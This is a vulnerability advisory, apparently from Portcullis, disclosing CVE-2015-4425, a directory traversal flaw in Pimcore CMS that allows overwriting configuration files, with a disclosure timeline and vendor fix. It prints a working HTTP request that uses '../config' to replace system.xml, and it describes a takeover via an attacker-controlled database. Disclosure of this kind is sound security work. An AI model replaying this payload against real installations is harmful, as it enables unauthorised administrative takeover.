Tried, Tested and Proven

Vulnerability title: Directory Traversal/Configuration Update in Pimcore CMS

CVE: CVE-2015-4425
Vendor: Pimcore
Product: Pimcore CMS
Affected version: Build 3450
Fixed version: Build 3473
Reported by: Josh Foote


It is possible for an administrative user with the ‘assets’ permission to overwrite system configuration files via exploiting a directory traversal vulnerability.

The following request can be used to update the ‘system.xml’ file of the web application:

POST /admin/asset/add-asset-compatibility/?parentId=1&dir=../config HTTP/1.1
Connection: keep-alive
Content-Length: 1502
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Content-Type: multipart/form-data; boundary=--------2072505619
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
Cookie: PHPSESSID=nnmupv1knofcpdgjdnivdr4v27; cookie-warn=true; _ga=GA1.2.1941920115.1426505099; pimcore_admin_sid=j79b6ad4afkjimslbj8l5ifuo4

Content-Disposition: form-data; name="Filedata"; filename="system.xml" 
Content-Type: application/xml

<?xml version="1.0"?>
<zend-config xmlns:zf="">


This issue could allow an attacker to create/overwrite malicious configuration, or other files on the server, in order to reduce the security posture of the application or lead to code execution should an administrative account become compromised.

Due to the lack of path validation, any file which the web server user has access to could be overwritten, with the exception of PHP files. It was possible to update the application’s configuration file to use an attacker controlled database, after which an attacker could authenticate as an administrator using their own credentials, and once authenticated amend the configuration to use the original database (as the configuration file was publicly accessible and could be read prior to this attack being performed), thus gaining full access to the application and its data.


Exploit code not required.


The vendor has released a patch.

Vendor status:

17/03/2015 Advisory created
17/04/2015 Vendor contacted
08/06/2015 Fix released
08/06/2015 CVE applied for
09/06/2015 CVE obtained
25/06/2015 Published

Copyright © Portcullis Computer Security Limited 2015, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.


The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.